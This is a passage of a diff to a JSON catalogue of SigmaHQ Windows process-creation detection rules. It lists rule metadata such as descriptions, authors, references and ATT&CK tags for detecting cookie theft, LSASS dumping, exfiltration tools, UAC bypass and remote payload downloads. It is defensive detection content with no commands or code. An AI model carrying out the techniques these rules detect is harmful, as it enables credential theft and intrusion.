+ ], + "filename": "proc_creation_win_susp_psexec_eula.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "attack.t1021" + ] + }, + "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", + "value": "Psexec Accepteula Condition" + }, + { + "description": "Detects specific process parameters as seen in DTRACK infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_dtrack.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "value": "DTRACK Process Creation" + }, + { + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_whoami_as_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "value": "WhoAmI as Parameter" + }, + { + "description": "Detect use of sqlite binary to query the Chrome Cookies database and steal the cookie data contained within it", + "meta": { + "author": "TropChaud", + "creation_date": "2022/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlite_chrome_cookies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chrome_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ] + }, + "uuid": "24c77512-782b-448a-8950-eddb0785fc71", + "value": "SQLite Chrome Cookie DB Access" + }, + { + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + ], + "filename": "proc_creation_win_screenconnect_anomaly.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "value": "ScreenConnect Backstage Mode Anomaly" + }, + { + "description": "Execution of well known tools for data exfiltration and tunneling", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate Administrator using tools" + ], + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" + ] + }, + "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", + "value": "Exfiltration and Tunneling Tools Execution" + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "value": "CL_LoadAssembly.ps1 Proxy Execution" + }, + { + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown but benign sub processes of the Windows DNS service dns.exe" + ], + "filename": "proc_creation_win_exploit_cve_2020_1350.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "value": "DNS RCE CVE-2020-1350" + }, + { + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage to restore snapshots", + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", + "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detects suspicious use of XORDump process memory dumping utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Another tool that uses the command line switches of XORdump" + ], + "filename": "proc_creation_win_xordump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/audibleblink/xordump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "value": "XORDump Use" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
+ ], + "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", + "value": "Use Short Name Path in Image" + }, + { + "description": "Detects a Windows command line executable started from MMC", + "meta": { + "author": "Karneades, Swisscom CSIRT", + "creation_date": "2019/08/05", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_mmc_spawn_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "value": "MMC Spawning Windows Shell" + }, + { + "description": "Detects the creation of a process from Windows task manager", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_taskmgr_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "value": "Taskmgr as Parent" + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "meta": { + "author": "frack113", + "creation_date": "2021/12/11", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_tasklist_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", + "value": "Suspicious Tasklist Discovery Command" + }, + { + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "value": "Microsoft IIS Connection Strings Decryption" + }, + { + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_iox.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EddieIvan01/iox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", + "value": "IOX Tunneling Tool" + }, + { + "description": "Detects process dump via legitimate sqldumper.exe binary", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate MSSQL Server actions" + ], + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "value": "Dumping Process via Sqldumper.exe" + }, + { + "description": "Use of reg to get MachineGuid information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_machineguid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", + "value": "Suspicious Query of MachineGUID" + }, + { + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "meta": { + "author": "frack113", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_icacls_deny.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": 
"4ae81040-fc1c-4249-bfa3-938d260214d9", + "value": "Use Icacls to Hide File to Everyone" + }, + { + "description": "Detect suspicious parent processes of well-known Windows processes", + "meta": { + "author": "vburov", + "creation_date": "2019/02/23", + "falsepositive": [ + "Some security products seem to spawn these" + ], + "filename": "proc_creation_win_proc_wrong_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036.005" + ] + }, + "uuid": "96036718-71cc-4027-a538-d1587e0006a7", + "value": "Windows Processes Suspicious Parent Directory" + }, + { + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_query_session_exfil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "value": "Query Usage To Exfil Data" + }, + { + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 
Update or later.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_pktmon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "value": "Use of PktMon.exe" + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "App-V clients" + ], + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" + }, + { + "description": "Downloads payload from remote server", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msoffice.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Reegun J (OCBC Bank)", + 
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "value": "Malicious Payload Download via Office Binaries" + }, + { + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/26", + "falsepositive": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "filename": "proc_creation_win_crime_snatch_ransomware.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", + "value": "Snatch Ransomware" + }, + { + "description": "Detects indicators of a UAC bypass method by mocking directories", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "value": "TrustedPath UAC Bypass Pattern" + }, + { + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate use by a software developer" + ], + "filename": "proc_creation_win_lolbin_wfc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "value": "Use of Wfc.exe" + }, + { + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "99c840f2-2012-46fd-9141-c761987550ef", + "value": "Bitsadmin Download File from IP" + }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2021/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_lsass_clone.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ] + }, + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Suspicious LSASS Process Clone" + }, + { + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "meta": { + "author": "Micah Babinski", + "creation_date": "2022/12/11", + "falsepositive": [ + "Legitimate use of the tool by administrators or users to update metadata of a binary" + ], + "filename": "proc_creation_win_susp_rcedit_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/electron/rcedit", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", 
+ "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rcedit_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" + ] + }, + "uuid": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "value": "Potential PE Metadata Tamper Using Rcedit" + }, + { + "description": "Detects base64 encoded listing Win32_Shadowcopy", + "meta": { + "author": "Christian Burkard", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_listing_shadowcopy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", + "value": "Base64 Encoded Listing of Shadowcopy" + }, + { + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", + "value": "Suspicious Usage Of ShellExec_RunDLL" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent binaries using GUP not currently identified" + ], + "filename": "proc_creation_win_susp_gup_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322445439180803", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "value": "Execute Arbitrary Binaries Using GUP Utility" + }, + { + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate uses of logon scripts distributed via group policy" + ], + "filename": "proc_creation_win_lolbin_gpscript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", + "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "1e59c230-6670-45bf-83b0-98903780607e", + "value": "Gpscript Execution" + }, + { + "description": "Detects nltest 
commands that can be used for information discovery", + "meta": { + "author": "Craig Young, oscd.community, Georg Lauenstein", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate administration use but user must be check out" + ], + "filename": "proc_creation_win_nltest_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1482/", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://attack.mitre.org/techniques/T1016/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016", + "attack.t1482" + ] + }, + "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "value": "Recon Activity with NLTEST" + }, + { + "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "meta": { + "author": "Sander Wiebing", + "creation_date": "2020/05/23", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "value": "Netsh RDP Port Opening" + }, + { + "description": "Detects the 
Installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "proc_creation_win_win_exchange_transportagent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" ], "tags": [ "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.t1505.002" ] }, - "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", - "value": "Defrag Deactivation" + "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", + "value": "MSExchange Transport Agent Installation" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + 